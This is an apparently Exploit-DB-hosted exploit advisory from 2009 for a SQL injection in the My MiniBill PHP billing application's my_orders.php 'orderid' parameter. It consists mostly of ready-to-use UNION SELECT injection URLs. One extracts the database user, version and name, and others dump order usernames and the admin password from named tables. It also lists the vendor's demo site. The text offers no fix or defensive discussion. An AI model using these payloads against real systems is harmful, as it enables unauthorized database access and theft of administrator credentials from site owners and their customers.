My Mini Bill - 'orderid' SQL Injection

EDB-ID:

8864




Platform:

PHP

Date:

2009-06-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

My MiniBill (my_orders.php) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://cupidsystems.com
------
More info:http://cupidsystems.com/products/myminibill/index.php
--------
Note: First You must register in the site  [path]/register.php
Then Go To exploit:
------------------
http://victim/[path]/my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--
Login Information:
-----------------
For:
username: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1
Password: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral
Demo:
http://cupidsystems.com/products/myminibill/demo/
Note: ALgerie en Coupe Du Monde In shaa ALLAH*
################################################################################################

# milw0rm.com [2009-06-03]